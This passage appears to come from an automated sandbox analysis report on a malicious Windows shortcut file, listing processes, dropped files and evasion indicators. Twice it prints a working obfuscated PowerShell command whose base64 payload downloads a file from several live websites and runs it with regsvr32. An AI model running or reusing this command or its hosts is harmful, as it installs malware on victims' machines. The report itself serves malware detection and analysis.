                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEFDDC8_2_02CEFDDC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD89D88_2_02CD89D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CECFD88_2_02CECFD8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD1BD48_2_02CD1BD4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE0DE88_2_02CE0DE8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDB1E08_2_02CDB1E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD1FE08_2_02CD1FE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD47888_2_02CD4788
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDDD808_2_02CDDD80
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDFBAC8_2_02CDFBAC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF39AC8_2_02CF39AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDD9A88_2_02CDD9A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDCBA48_2_02CDCBA4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEA1A08_2_02CEA1A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE49A08_2_02CE49A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD8DB48_2_02CD8DB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD59B08_2_02CD59B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD934C8_2_02CD934C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD4F4C8_2_02CD4F4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE95448_2_02CE9544
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEDB5C8_2_02CEDB5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEAD548_2_02CEAD54
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD6D508_2_02CD6D50
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD5F688_2_02CD5F68
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF3F788_2_02CF3F78
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDAF708_2_02CDAF70
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD770C8_2_02CD770C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEBD1C8_2_02CEBD1C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDB7288_2_02CDB728
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEAF248_2_02CEAF24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD8B348_2_02CD8B34
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE5B348_2_02CE5B34
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF55348_2_02CF5534
                  Source: GMOWDTRfIJ.xtq.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                  Source: 2022-04-26_1045.exe.lnkVirustotal: Detection: 32%
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Atpvfjzdexae\enxldhj.oxc"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                  Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtqJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Atpvfjzdexae\enxldhj.oxc"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220426Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ap2dulp.pbi.ps1Jump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winLNK@22/18@1/65
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEC860 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,8_2_02CEC860
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3368:120:WilError_01
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001034 LoadResource,LockResource,SizeofResource,6_2_0000000180001034
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Suspicious powershell command line found
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFC0111000B push ds; ret 0_2_00007FFC0111002C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F00C GetModuleHandleA,LoadLibraryA,GetProcAddress,6_2_000000018000F00C
                  Source: GMOWDTRfIJ.xtq.2.drStatic PE information: real checksum: 0x7e901 should be: 0x77673

                  Persistence and Installation Behavior

                  barindex
                  Windows shortcut file (LNK) starts blacklisted processes
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\GMOWDTRfIJ.xtqJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\GMOWDTRfIJ.xtqJump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\Atpvfjzdexae\enxldhj.oxc (copy)Jump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\Atpvfjzdexae\enxldhj.oxc (copy)Jump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\Atpvfjzdexae\enxldhj.oxc:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C030 IsIconic,GetWindowPlacement,GetWindowRect,6_2_000000018000C030
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A74C IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,6_2_000000018000A74C
                  Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
